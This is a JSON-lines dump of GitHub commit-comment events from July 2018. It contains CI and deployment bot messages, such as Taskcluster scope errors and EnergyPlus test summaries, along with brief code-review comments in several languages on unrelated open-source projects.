{"id":"7951563827","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-purge-cache"},"payload":{"comment":{"id":29674493,"position":null,"line":null,"path":null,"commit_id":"73b3e4bb486c6852d7f6076d0f57c5f29baf9bda","created_at":"2018-07-11T17:34:12Z","updated_at":"2018-07-11T17:34:12Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:project/taskcluster/testing/taskcluster-purge-cache\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/taskcluster/taskcluster-purge-cache:branch:bug-1462760\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:project/taskcluster/testing/taskcluster-purge-cache\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/SMUHs4wVSYevMYtavn9MiQ\",\n                \"queue:schedule-task:taskcluster-github/SMUHs4wVSYevMYtavn9MiQ/SMUHs4wVSYevMYtavn9MiQ\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-11T17:34:12.090Z\n\n</details>"}},"created_at":"2018-07-11T17:34:12Z"}
{"id":"7951563921","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-purge-cache"},"payload":{"comment":{"id":29674494,"position":null,"line":null,"path":null,"commit_id":"73b3e4bb486c6852d7f6076d0f57c5f29baf9bda","created_at":"2018-07-11T17:34:13Z","updated_at":"2018-07-11T17:34:13Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:project/taskcluster/testing/taskcluster-purge-cache\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/taskcluster/taskcluster-purge-cache:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:project/taskcluster/testing/taskcluster-purge-cache\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/YLFApvLQQ_muZNS0oe271Q\",\n                \"queue:schedule-task:taskcluster-github/YLFApvLQQ_muZNS0oe271Q/YLFApvLQQ_muZNS0oe271Q\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-11T17:34:13.030Z\n\n</details>"}},"created_at":"2018-07-11T17:34:13Z"}
{"id":"7951564001","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29674495,"position":null,"line":null,"path":null,"commit_id":"7e2b818256f468f8097614bb4e61f54fe2f01b3b","created_at":"2018-07-11T17:34:14Z","updated_at":"2018-07-11T17:34:14Z","author_association":"OWNER","body":"Created multidev environment [next50#pr-1](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T17:34:14Z"}
{"id":"7951570175","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29674507,"position":39,"line":162,"path":"controllers/NoteController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-11T17:35:28Z","updated_at":"2018-07-11T17:35:28Z","author_association":"OWNER","body":"Ага, хотел не писать, но шторм ругается если не ловить Эксепшины"}},"created_at":"2018-07-11T17:35:28Z"}
{"id":"7951571064","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29674509,"position":null,"line":null,"path":null,"commit_id":"2ef33158486831aa061050f5cc7d316fee17721d","created_at":"2018-07-11T17:35:39Z","updated_at":"2018-07-11T17:35:39Z","author_association":"CONTRIBUTOR","body":"I always found it kinda redundant too... (inb4 someone links one of my commits with the word in it)"}},"created_at":"2018-07-11T17:35:39Z"}
{"id":"7951572807","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674513,"position":null,"line":null,"path":null,"commit_id":"85826c512439de662dbaf2d1395442ea3c820fc2","created_at":"2018-07-11T17:36:00Z","updated_at":"2018-07-11T17:36:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-173558 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-173558\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:36:00Z"}
{"id":"7951576114","type":"CommitCommentEvent","actor":{"login":"mrNkravchenko"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29674518,"position":25,"line":119,"path":"controllers/NoteController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-11T17:36:37Z","updated_at":"2018-07-11T17:36:37Z","author_association":"OWNER","body":"Да, пропустил, все выискивал почему не заходит в бефорсейф, но на прошлом уроке обьяснил, что сначала бефор валидэйт идет"}},"created_at":"2018-07-11T17:36:37Z"}
{"id":"7951577066","type":"CommitCommentEvent","actor":{"login":"mifl"},"repo":{"name":"bq/aquaris-U-Plus"},"payload":{"comment":{"id":29674521,"position":null,"line":null,"path":null,"commit_id":"f44c3e1ff2208d82f683c4526efed2f7776cf5b3","created_at":"2018-07-11T17:36:48Z","updated_at":"2018-07-11T17:36:48Z","author_association":"NONE","body":"In sound/core/rawmidi.c\r\nThe lines 983 and 984 are duplicated. To clarify this, can see the commit:\r\nhttps://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a3d3f4df0b4768f3bb41209bcf601a394fbca5d5"}},"created_at":"2018-07-11T17:36:48Z"}
{"id":"7951578033","type":"CommitCommentEvent","actor":{"login":"marvhen"},"repo":{"name":"marvhen/ReflowMarkdown"},"payload":{"comment":{"id":29674525,"position":61,"line":58,"path":"src/testable.ts","commit_id":"6eeba274cc27c0978ca1ffe762a8d1b3b3396480","created_at":"2018-07-11T17:36:59Z","updated_at":"2018-07-11T17:36:59Z","author_association":"OWNER","body":"lineIsSentenceEnd returns a false positive for title punctuation such as Mr., Mrs., Dr., Ms., etc."}},"created_at":"2018-07-11T17:36:59Z"}
{"id":"7951584612","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29674533,"position":22,"line":807,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"9ee7db8c531a886daaf3e1a197a6ff4068756803","created_at":"2018-07-11T17:38:21Z","updated_at":"2018-07-11T17:38:21Z","author_association":"COLLABORATOR","body":"Hmm, no. This is used like \"buxil kisel\" \"buxil virus\" etc, which can only be translated to \"bu tür hastalık ..(için..)\". Böyle could work if the next word is a plural but not if it's singular."}},"created_at":"2018-07-11T17:38:21Z"}
{"id":"7951585061","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29674534,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-11T17:38:26Z","updated_at":"2018-07-11T17:38:26Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2786 of 2933 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 149 tests had: EIO diffs.\n * 146 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 3 tests had: MTR small diffs.\n * 18 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 476\n * Failed: 147\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T17:38:26Z"}
{"id":"7951585221","type":"CommitCommentEvent","actor":{"login":"DarkAbhi"},"repo":{"name":"SudeepDuhoon/SakhatKernel"},"payload":{"comment":{"id":29674536,"position":null,"line":null,"path":null,"commit_id":"525d406bb6938b63b58db84d92b947121c745166","created_at":"2018-07-11T17:38:28Z","updated_at":"2018-07-11T17:38:28Z","author_association":"CONTRIBUTOR","body":"This isn't required and will not matter as Android doesn't have a swap partition. They don't use a swap partition because flash tends to be slow to write.To be a little more specific, it does use paging but not swap space."}},"created_at":"2018-07-11T17:38:28Z"}
{"id":"7951589730","type":"CommitCommentEvent","actor":{"login":"frnkvieira"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29674548,"position":null,"line":null,"path":null,"commit_id":"69d4194b8282ddb8d01fc0dfabb094078fc45136","created_at":"2018-07-11T17:39:22Z","updated_at":"2018-07-11T17:39:22Z","author_association":"MEMBER","body":"Just for the record: This is a work in progress that can completely change/rollback in the next commits.\r\nCode style is now controlled by Black (https://github.com/ambv/black)"}},"created_at":"2018-07-11T17:39:22Z"}
{"id":"7951591035","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29674553,"position":null,"line":null,"path":null,"commit_id":"59de700b431212558541bbe2e0fb80e9125955cf","created_at":"2018-07-11T17:39:38Z","updated_at":"2018-07-11T17:39:38Z","author_association":"COLLABORATOR","body":"Puzzle `492-2cc36189` disappeared from [`src/main/resources/com/zerocracy/stk/pmo/people/update_skills.groovy`](https://github.com/zerocracy/farm/blob/master/src/main/resources/com/zerocracy/stk/pmo/people/update_skills.groovy), that's why I closed #559. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T17:39:38Z"}
{"id":"7951591702","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29674555,"position":67,"line":4952,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"609271bc684c6529ca1c063378dca5aeb6a081b9","created_at":"2018-07-11T17:39:46Z","updated_at":"2018-07-11T17:39:46Z","author_association":"COLLABORATOR","body":"This is used with \"Kim şunu yaparsa o kişi şöyle olur\" type of sentences, so I thought it shouldn't be itg."}},"created_at":"2018-07-11T17:39:46Z"}
{"id":"7951592665","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29674557,"position":null,"line":null,"path":null,"commit_id":"59de700b431212558541bbe2e0fb80e9125955cf","created_at":"2018-07-11T17:39:57Z","updated_at":"2018-07-11T17:39:57Z","author_association":"COLLABORATOR","body":"Puzzle `559-80a85ff3` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/people/update_skills.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/people/update_skills.groovy)   and submitted as #1411. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T17:39:57Z"}
{"id":"7951593902","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29674560,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T17:40:13Z","updated_at":"2018-07-11T17:40:13Z","author_association":"CONTRIBUTOR","body":"ye, even better if it also states the timer that is set, 5 seconds in this case.\r\ntoo bad none of the fancy sai editors is being updated... rip"}},"created_at":"2018-07-11T17:40:13Z"}
{"id":"7951595092","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29674562,"position":44,"line":4929,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"609271bc684c6529ca1c063378dca5aeb6a081b9","created_at":"2018-07-11T17:40:25Z","updated_at":"2018-07-11T17:40:25Z","author_association":"COLLABORATOR","body":"Hmm, I think manda would be the best translation, I couldn't think of it before. I'll add both."}},"created_at":"2018-07-11T17:40:25Z"}
{"id":"7951595685","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29674563,"position":null,"line":null,"path":null,"commit_id":"59de700b431212558541bbe2e0fb80e9125955cf","created_at":"2018-07-11T17:40:32Z","updated_at":"2018-07-11T17:40:32Z","author_association":"COLLABORATOR","body":"Puzzle `559-34ba884a` discovered in   [`src/main/java/com/zerocracy/tk/TkTeam.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/tk/TkTeam.java)   and submitted as #1412. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T17:40:32Z"}
{"id":"7951604402","type":"CommitCommentEvent","actor":{"login":"ArkoG"},"repo":{"name":"ArkoG/LCDA"},"payload":{"comment":{"id":29674587,"position":52,"line":58,"path":"README.md","commit_id":"975472f41c7febb2659f3c077b2baeec0638ddba","created_at":"2018-07-11T17:42:15Z","updated_at":"2018-07-11T17:42:15Z","author_association":"OWNER","body":"je ne pense pas que ce soit une tâche pour un contributeur lambda ;)"}},"created_at":"2018-07-11T17:42:15Z"}
{"id":"7951604561","type":"CommitCommentEvent","actor":{"login":"SwapnilSoni1999"},"repo":{"name":"SwapnilSoni1999/android_device_xiaomi_santoni"},"payload":{"comment":{"id":29674588,"position":null,"line":null,"path":null,"commit_id":"e305d000ae394452ad12250ae9950e58fdcd3d97","created_at":"2018-07-11T17:42:17Z","updated_at":"2018-07-11T17:42:17Z","author_association":"OWNER","body":"does keeping it on causing any trouble? "}},"created_at":"2018-07-11T17:42:17Z"}
{"id":"7951607382","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29674596,"position":11,"line":11,"path":"Client/game_sa/CAnimBlendNodeSA.h","commit_id":"2bf1008fa8a6e4da073827692b8bb0d57a9d53bd","created_at":"2018-07-11T17:42:51Z","updated_at":"2018-07-11T17:42:51Z","author_association":"MEMBER","body":"please remove ifndef"}},"created_at":"2018-07-11T17:42:51Z"}
{"id":"7951607432","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674597,"position":null,"line":null,"path":null,"commit_id":"f64350b0b7b48b580e9135101e9d71273cbf7cd9","created_at":"2018-07-11T17:42:52Z","updated_at":"2018-07-11T17:42:52Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-174250 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-174250\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:42:52Z"}
{"id":"7951611969","type":"CommitCommentEvent","actor":{"login":"sivy"},"repo":{"name":"dansup/pixelfed"},"payload":{"comment":{"id":29674604,"position":null,"line":null,"path":null,"commit_id":"bc5356420afde942f59954388286aeff421e9f0e","created_at":"2018-07-11T17:43:44Z","updated_at":"2018-07-11T17:43:44Z","author_association":"NONE","body":"Whhyyyyyyy? I loved the color logo. 😁 "}},"created_at":"2018-07-11T17:43:44Z"}
{"id":"7951613788","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Mobile"},"payload":{"comment":{"id":29674606,"position":16,"line":46,"path":"Http_Post/Http_Post/MainPage.xaml.cs","commit_id":"f398abbf305923964cd61f0d29b566c4b3ba8621","created_at":"2018-07-11T17:44:05Z","updated_at":"2018-07-11T17:44:05Z","author_association":"NONE","body":"Password это одно слово, так что PassWord это что-то странное :)"}},"created_at":"2018-07-11T17:44:05Z"}
{"id":"7951614960","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674608,"position":null,"line":null,"path":null,"commit_id":"4915c38134a6a05f64b7f65b0b186d4d97a70204","created_at":"2018-07-11T17:44:19Z","updated_at":"2018-07-11T17:44:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-174418 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-174418\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:44:19Z"}
{"id":"7951615341","type":"CommitCommentEvent","actor":{"login":"jpmckinney"},"repo":{"name":"open-contracting/standard"},"payload":{"comment":{"id":29674611,"position":null,"line":null,"path":null,"commit_id":"9faa33753fbcb75e2909e993a05cd4a9046c4b12","created_at":"2018-07-11T17:44:24Z","updated_at":"2018-07-11T17:44:24Z","author_association":"MEMBER","body":"Ok, created 50+ PRs thanks to `sed` and my Rake tasks. We should stick to just putting `sudo: false` in every repo's `.travis.yml` (no harm, just a few more characters)."}},"created_at":"2018-07-11T17:44:24Z"}
{"id":"7951615431","type":"CommitCommentEvent","actor":{"login":"EBhoraniya"},"repo":{"name":"EBhoraniya/URL-MINIFY"},"payload":{"comment":{"id":29674612,"position":null,"line":null,"path":null,"commit_id":"12f556ce111905549bc489b2b198856ad6a0e949","created_at":"2018-07-11T17:44:25Z","updated_at":"2018-07-11T17:44:25Z","author_association":"OWNER","body":"URL MINIFY is a tool to shorten URL. you can visit website at [https://url-minify.herokuapp.com/](url)\r\n"}},"created_at":"2018-07-11T17:44:25Z"}
{"id":"7951615611","type":"CommitCommentEvent","actor":{"login":"FerhatACAR"},"repo":{"name":"FerhatACAR/github-slideshow"},"payload":{"comment":{"id":29674613,"position":null,"line":null,"path":null,"commit_id":"3e90c510234a4b44264f6d423255852cd488cb39","created_at":"2018-07-11T17:44:27Z","updated_at":"2018-07-11T17:44:27Z","author_association":"OWNER","body":"tamam"}},"created_at":"2018-07-11T17:44:27Z"}
{"id":"7951616367","type":"CommitCommentEvent","actor":{"login":"jsrehak"},"repo":{"name":"SlaybaughLab/BART"},"payload":{"comment":{"id":29674617,"position":null,"line":null,"path":null,"commit_id":"3c16d87a78ed24c46bc7e06443fdb2bfa924fd0e","created_at":"2018-07-11T17:44:36Z","updated_at":"2018-07-11T17:44:36Z","author_association":"COLLABORATOR","body":"@AlexanderBlank no problem, the settings were incorrectly set so that anyone in our team could push to the `upstream` repo which is not ideal (to avoid things like this). I've changed it, so it should prevent it from happening again."}},"created_at":"2018-07-11T17:44:36Z"}
{"id":"7951616406","type":"CommitCommentEvent","actor":{"login":"brunohcfaria"},"repo":{"name":"INDTSON/SHARC"},"payload":{"comment":{"id":29674618,"position":28,"line":118,"path":"sharc/simulation_imt_vale.py","commit_id":"b6bcb8c3f6ee9defe7afebfbf2c7963b217a0a8d","created_at":"2018-07-11T17:44:37Z","updated_at":"2018-07-11T17:44:37Z","author_association":"NONE","body":"Why the first element of `self.num_rb_per_bs`? Shouldn't this be initialized on `connect_ue_to_bs` method?"}},"created_at":"2018-07-11T17:44:37Z"}
{"id":"7951618443","type":"CommitCommentEvent","actor":{"login":"danieldaeschle"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29674619,"position":null,"line":null,"path":null,"commit_id":"69d4194b8282ddb8d01fc0dfabb094078fc45136","created_at":"2018-07-11T17:45:01Z","updated_at":"2018-07-11T17:45:01Z","author_association":"CONTRIBUTOR","body":"Ok, i would prefer single quotes"}},"created_at":"2018-07-11T17:45:01Z"}
{"id":"7951618934","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29674623,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T17:45:07Z","updated_at":"2018-07-11T17:45:07Z","author_association":"CONTRIBUTOR","body":"FYI all DB developers @Killyana @ZenoX92 @PolarCookie @Jonne733 and so on,\r\n\r\nthe only DB editor that is currently being updated is https://github.com/Faq/Truice\r\nthe rest are NOT really reliable (talking about Keira, SAI-Editor and so on)."}},"created_at":"2018-07-11T17:45:07Z"}
{"id":"7951622753","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29674634,"position":null,"line":null,"path":null,"commit_id":"f4c6599b8d8a45803907d1f04e3b2e6b0f880a77","created_at":"2018-07-11T17:45:50Z","updated_at":"2018-07-11T17:45:50Z","author_association":"OWNER","body":"Created multidev environment [next50#pr-1](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T17:45:50Z"}
{"id":"7951627779","type":"CommitCommentEvent","actor":{"login":"gistrec"},"repo":{"name":"gistrec/C-P2P-Chat"},"payload":{"comment":{"id":29674644,"position":null,"line":null,"path":null,"commit_id":"7eb98d91a566aaaa7c8c312a7ef114d19a8aec4a","created_at":"2018-07-11T17:46:53Z","updated_at":"2018-07-11T17:46:53Z","author_association":"OWNER","body":":imp::imp::imp: НУЖЕН РЕФАКТОРИНГ"}},"created_at":"2018-07-11T17:46:53Z"}
{"id":"7951629615","type":"CommitCommentEvent","actor":{"login":"sichvoge"},"repo":{"name":"raml-org/raml-examples"},"payload":{"comment":{"id":29674647,"position":null,"line":null,"path":null,"commit_id":"e91308b6b944a47e1645f23b7a2397ccc58fed3a","created_at":"2018-07-11T17:47:13Z","updated_at":"2018-07-11T17:47:13Z","author_association":"CONTRIBUTOR","body":"Yea. Some are probably examples taken from the 1.0 spec. But feel free to change them of course. "}},"created_at":"2018-07-11T17:47:13Z"}
{"id":"7951630482","type":"CommitCommentEvent","actor":{"login":"easyleha"},"repo":{"name":"easyleha/JE_HomeWork_7"},"payload":{"comment":{"id":29674649,"position":null,"line":null,"path":null,"commit_id":"3ebfbc0dbbf34b06ac9cdb7f18dd22c2f1efa062","created_at":"2018-07-11T17:47:24Z","updated_at":"2018-07-11T17:47:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Дз7.2 MyHashSet<> Щербина](https://trello.com/c/LbrPuEF3/62-%D0%B4%D0%B772-myhashset-%D1%89%D0%B5%D1%80%D0%B1%D0%B8%D0%BD%D0%B0)"}},"created_at":"2018-07-11T17:47:24Z"}
{"id":"7951637706","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29674663,"position":51,"line":51,"path":"pom.xml","commit_id":"cafca7ff43e4a719178abde9aefaa0c7fb840536","created_at":"2018-07-11T17:48:46Z","updated_at":"2018-07-11T17:48:46Z","author_association":"MEMBER","body":"This might not be necessary as I don't see it used elsewhere in the rest of the pom"}},"created_at":"2018-07-11T17:48:46Z"}
{"id":"7951642257","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29674673,"position":52,"line":52,"path":"pom.xml","commit_id":"cafca7ff43e4a719178abde9aefaa0c7fb840536","created_at":"2018-07-11T17:49:42Z","updated_at":"2018-07-11T17:49:42Z","author_association":"MEMBER","body":"You should update this commit to use the last revision with the compressed JS file that you want to use"}},"created_at":"2018-07-11T17:49:42Z"}
